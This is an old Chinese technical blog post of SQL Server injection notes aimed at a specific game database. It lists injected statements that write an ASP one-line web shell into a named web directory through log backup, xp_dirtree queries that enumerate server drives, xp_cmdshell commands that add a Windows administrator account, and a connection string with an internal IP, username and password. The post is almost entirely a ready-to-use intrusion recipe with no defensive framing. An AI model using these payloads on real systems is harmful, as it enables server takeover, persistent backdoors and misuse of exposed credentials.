Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1134462
  • 博文数量: 276
  • 博客积分: 10077
  • 博客等级: 上将
  • 技术积分: 2513
  • 用 户 组: 普通用户
  • 注册时间: 2007-08-24 20:31
文章分类

全部博文(276)

文章存档

2020年(1)

2015年(5)

2012年(2)

2011年(6)

2010年(7)

2009年(224)

2008年(31)

我的朋友

分类: 数据库开发技术

2009-07-14 09:31:51

1.InjectionURL';alter database rxjhgame set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL';backup log rxjhgame to disk = 'c:\cpu' with init-- (减少备分数据的大小)

4.InjectionURL';insert into cmd (a) values (0x3C256576616C2872657175657374282223222929253E)-- (插入一句话木马)

5.InjectionURL';backup log rxjhgame to disk = 'E:\IDDCWEB\17qupk\wwwroot\gan.asp'-- (备分日志到WEB路径)

6.InjectionURL';drop table cmd-- (删除新建的cmd表)

7.InjectionURL';alter database rxjhgame set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)


Driver={Sql Server};Server=192.168.200.188,1433;Database=rxjhgame;Uid=17qupk;Pwd=fdkjdsf


create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 创建一个表

insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'E:\',1,1;--       将E盘的目录写入表中
通过xp_dirtree组件 把E盘的内容 存到TEMP表里 然后查看TEMP的内容 就是E盘的内容

delete temp where num1>='1' 删除TEMP表里的内容


insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'E:\IDDCWEB\17qupk\wwwroot',1,1;--


日志备份:
alter database rxjhgame set RECOVERY FULL--
create table cmd (a image)--
backup log rxjhgame to disk = 'c:\cpu' with init--
insert into cmd (a) values ('<%execute request("a")%>');--
backup log rxjhgame to disk = 'E:\IDDCWEB\17qupk\wwwroot\gan.asp'--
drop table cmd--
alter database rxjhgame set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

用查询分析器备份时,必须要用当前用户登录,用SA无法成功
backup database rxjhgame to disk = 'c:\x.bak' 备份数据库

sa权限创建管理员用户

1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user jiaozhu jiaozhu /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaozhu /add';--


alter database [17qupkdongyi] set RECOVERY FULL--
出错时加[]作为对象处理
阅读(1370) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~